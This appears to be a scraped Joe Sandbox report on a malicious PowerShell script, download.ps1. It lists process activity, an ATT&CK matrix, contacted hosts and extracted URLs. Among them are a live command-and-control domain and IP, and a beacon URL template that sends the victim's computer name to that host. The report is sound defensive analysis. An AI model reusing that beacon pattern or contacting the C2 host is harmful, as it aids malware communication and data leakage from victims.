Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping211
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		131
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager131
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps13%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://$gnpdew7u5crmlb1/$bjsawurth3e4ngc.php?id=$env:computername&key=$qbxwcvhef&s=5270%Avira URL Cloudsafe
http://cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527100%Avira URL Cloudmalware
http://crl.micros?0%Avira URL Cloudsafe
http://cmacnnkfbhlcncm.top100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.181.132
truefalse
    		high
    cmacnnkfbhlcncm.top
    		45.61.136.138
    		truefalse
      		unknown
      ax-0001.ax-msedge.net
      		150.171.27.10
      		truefalse
        		high
        fp2e7a.wpc.phicdn.net
        		192.229.221.95
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527false
          • Avira URL Cloud: malware
          		unknown
          http://www.google.com/false
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifpowershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.2314021389.0000016B46C8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46BF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38317000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 00000000.00000002.2314021389.0000016B46A8F000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://www.google.com/images/hpp/red-gift-box-42px.pngXpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://crl.micros?powershell.exe, 00000000.00000002.2323525434.0000016B4ECB9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schema.org/WebPagepowershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B39214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46BF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B39078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B39228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3923C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38EFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B39242000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B39221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38EDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B39231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38EF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38F15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38EE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3921A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3922F000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://0.google.com/powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.google.com/logos/doodles/2024/seasonal-holidays-2024powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schema.org/WebPageXpowershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/powershell.exe, 00000000.00000002.2314021389.0000016B46A8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2314021389.0000016B46A8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.google.compowershell.exe, 00000000.00000002.2272509020.0000016B38317000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3830E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://apis.google.compowershell.exe, 00000000.00000002.2314021389.0000016B46C8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46BF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2272509020.0000016B36A21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2314021389.0000016B46A8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.2314021389.0000016B46C8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46BF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38359000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://$gnpdew7u5crmlb1/$bjsawurth3e4ngc.php?id=$env:computername&key=$qbxwcvhef&s=527powershell.exe, 00000000.00000002.2272509020.0000016B36C49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2272509020.0000016B36C49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.2272509020.0000016B36C49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2272509020.0000016B36C49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://contoso.com/Iconpowershell.exe, 00000000.00000002.2314021389.0000016B46A8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.google.com/images/hpp/red-gift-box-42px.pngpowershell.exe, 00000000.00000002.2272509020.0000016B3830E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000B.00000003.2406543142.00000287442E0000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.drfalse
                                                                                		high
                                                                                http://crl.ver)svchost.exe, 0000000B.00000002.3426485462.0000028744400000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://0.googlepowershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://cmacnnkfbhlcncm.toppowershell.exe, 00000000.00000002.2272509020.0000016B37F44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3830E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.google.com/preferences?hl=enpowershell.exe, 00000000.00000002.2272509020.0000016B3830E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2272509020.0000016B36C49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://0.google.powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifXpowershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://g.live.com/odclientsettings/Prod1C:qmgr.db.11.drfalse
                                                                                                    		high
                                                                                                    https://www.google.com/url?q=https://www.google.com/shopping/holiday100%3Fsource%3Dh100_2024.googlehpowershell.exe, 00000000.00000002.2272509020.0000016B3830E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://0.google.com/powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.2272509020.0000016B38359000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3830E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.2272509020.0000016B36C49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.2272509020.0000016B36A21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.2272509020.0000016B38511000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high

                                                                                                                          World Map of Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public IPs

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          45.61.136.138
                                                                                                                          		cmacnnkfbhlcncm.topUnited States
                                                                                                                          		40676AS40676USfalse
                                                                                                                          142.250.181.132
                                                                                                                          		www.google.comUnited States
                                                                                                                          		15169GOOGLEUSfalse

                                                                                                                          Private

                                                                                                                          IP
                                                                                                                          127.0.0.1

                                                                                                                          General Information

                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1577863
                                                                                                                          Start date and time:2024-12-18 20:42:13 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 4m 43s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:20
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:download.ps1
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal68.evad.winPS1@3/11@2/3
                                                                                                                          EGA Information:Failed
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 93%
                                                                                                                          • Number of executed functions: 11
                                                                                                                          • Number of non-executed functions: 5
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .ps1

                                                                                                                          Warnings

                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 23.218.208.109, 40.126.53.13, 20.199.58.43, 13.107.246.63, 20.223.35.26, 104.126.37.178, 4.245.163.56, 150.171.27.10, 2.19.193.129
                                                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, prod.fs.microsoft.com.akadns.net
                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 2196 because it is empty
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • VT rate limit hit for: download.ps1

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          TimeTypeDescription
                                                                                                                          14:43:11API Interceptor46x Sleep call for process: powershell.exe modified
                                                                                                                          14:43:32API Interceptor2x Sleep call for process: svchost.exe modified

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • cmacnnkfbhlcncm.top/cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527
                                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • cmacnnkfbhlcncm.top/57fd316pguhtr.php?id=computer&key=75439930857&s=527
                                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • cmacnnkfbhlcncm.top/rz932vog4whtr.php?id=user-PC&key=63562548914&s=527
                                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • cmacnnkfbhlcncm.top/h5raxn90w1htr.php?id=user-PC&key=130484823816&s=527

                                                                                                                          Domains

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          ax-0001.ax-msedge.netPyIsvSahWy.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 150.171.27.10
                                                                                                                          bandwidth_monitor.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 150.171.27.10
                                                                                                                          Ball - Temp.data for GCMs.docGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 150.171.27.10
                                                                                                                          https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 150.171.27.10
                                                                                                                          random.exe.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 150.171.27.10
                                                                                                                          stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                          • 150.171.28.10
                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 150.171.27.10
                                                                                                                          R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 150.171.28.10
                                                                                                                          index.html.docxGet hashmaliciousUnknownBrowse
                                                                                                                          • 150.171.27.10
                                                                                                                          99awhy8l.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 150.171.28.10
                                                                                                                          cmacnnkfbhlcncm.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • 45.61.136.138
                                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • 45.61.136.138
                                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • 45.61.136.138
                                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • 45.61.136.138
                                                                                                                          fp2e7a.wpc.phicdn.netsolara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 192.229.221.95
                                                                                                                          g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                          • 192.229.221.95
                                                                                                                          http://golden1-alert.net/onlineGet hashmaliciousUnknownBrowse
                                                                                                                          • 192.229.221.95
                                                                                                                          ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 192.229.221.95
                                                                                                                          random.exe.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 192.229.221.95
                                                                                                                          https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                                                          • 192.229.221.95
                                                                                                                          stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                          • 192.229.221.95
                                                                                                                          GV7DzNoqCI.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 192.229.221.95
                                                                                                                          sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 192.229.221.95
                                                                                                                          R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 192.229.221.95

                                                                                                                          ASNs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          AS40676USloligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 23.179.110.68
                                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • 45.61.136.138
                                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • 45.61.136.138
                                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • 45.61.136.138
                                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • 45.61.136.138
                                                                                                                          7hCWDvuinz.jsGet hashmaliciousUnknownBrowse
                                                                                                                          • 45.61.137.71
                                                                                                                          Fattura72543461.jsGet hashmaliciousUnknownBrowse
                                                                                                                          • 45.61.137.71
                                                                                                                          Fattura72543461.jsGet hashmaliciousUnknownBrowse
                                                                                                                          • 45.61.137.71
                                                                                                                          Fattura60963242.jsGet hashmaliciousUnknownBrowse
                                                                                                                          • 45.61.137.71
                                                                                                                          g12Hh44xD1.jsGet hashmaliciousUnknownBrowse
                                                                                                                          • 45.61.137.71

                                                                                                                          JA3 Fingerprints

                                                                                                                          No context

                                                                                                                          Dropped Files

                                                                                                                          No context

                                                                                                                          Created / dropped Files

                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                          Download File
